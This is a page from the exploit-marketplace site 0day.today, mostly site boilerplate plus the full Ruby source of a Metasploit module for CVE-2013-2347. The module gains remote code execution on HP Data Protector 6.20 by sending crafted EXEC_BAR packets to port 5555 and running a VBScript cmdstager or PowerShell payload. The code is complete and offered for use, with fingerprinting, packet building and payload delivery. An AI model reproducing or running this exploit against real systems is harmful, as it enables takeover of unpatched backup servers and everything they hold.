0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP Data Protector Backup Client Service Remote Code Execution
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'HP Data Protector Backup Client Service Remote Code Execution', 'Description' => %q{ This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code execution. The vulnerability exists in the EXEC_BAR operation, which allows to execute arbitrary processes. This module has been tested successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2. }, 'Author' => [ 'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2347' ], [ 'BID', '64647' ], [ 'ZDI', '14-008' ], [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ], [ 'URL', 'http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html' ] ], 'Privileged' => true, 'Payload' => { 'DisableNops' => true }, 'DefaultOptions' => { 'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot") }, 'Platform' => 'win', 'Targets' => [ [ 'HP Data Protector 6.20 build 370 / VBScript CMDStager', { } ], [ 'HP Data Protector 6.20 build 370 / Powershell', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe']) ], self.class) end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 21 return Exploit::CheckCode::Appears elsif minor == 21 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Detected end end def exploit if target.name =~ /VBScript CMDStager/ # 7500 just in case, to be sure the command fits after # environment variables expansion execute_cmdstager({:linemax => 7500}) elsif target.name =~ /Powershell/ # Environment variables are not being expanded before, neither in CreateProcess command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "") if command.length > 8000 # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command") end print_status("#{peer} - Exploiting through Powershell...") exec_bar(datastore['CMDPATH'], command, "\x00") end end def peer "#{rhost}:#{rport}" end def build_pkt(fields) data = "\xff\xfe" # BOM Unicode fields.each do |v| data << "#{Rex::Text.to_unicode(v)}\x00\x00" data << Rex::Text.to_unicode(" ") # Separator end data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator return [data.length].pack("N") + data end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def exec_bar(cmd, *args) connect pkt = build_pkt([ "2", # Message Type rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), "11", # Opcode EXEC_BAR rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), "#{cmd}", # Executable rand_text_alpha(8) ].concat(args)) sock.put(pkt) # In my testings the default timeout (10) isn't enough begin res = sock.get_once(-1, 20) rescue EOFError # happens when using the Powershell method disconnect return end fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res) disconnect end def exec_bar?(data) return false if data.blank? data_unpacked = data.unpack("NnVv") data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0 end def execute_command(cmd, opts = {}) exec_bar(datastore['CMDPATH'], "/c #{cmd}", "\x00") end def get_vbs_string(str) vbs_str = "" str.each_byte { |b| vbs_str << "Chr(#{b})+" } return vbs_str.chomp("+") end # Make the modifications required to the specific encoder # This exploit uses an specific encoder because quotes (") # aren't allowed when injecting commands def execute_cmdstager_begin(opts) var_decoded = @stager_instance.instance_variable_get(:@var_decoded) var_encoded = @stager_instance.instance_variable_get(:@var_encoded) decoded_file = "#{var_decoded}.exe" encoded_file = "#{var_encoded}.b64" @cmd_list.each do |command| # Because the exploit kills cscript processes to speed up and reliability command.gsub!(/cscript \/\/nologo/, "wscript //nologo") command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file)) command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file)) end end end # 0day.today [2024-12-24] #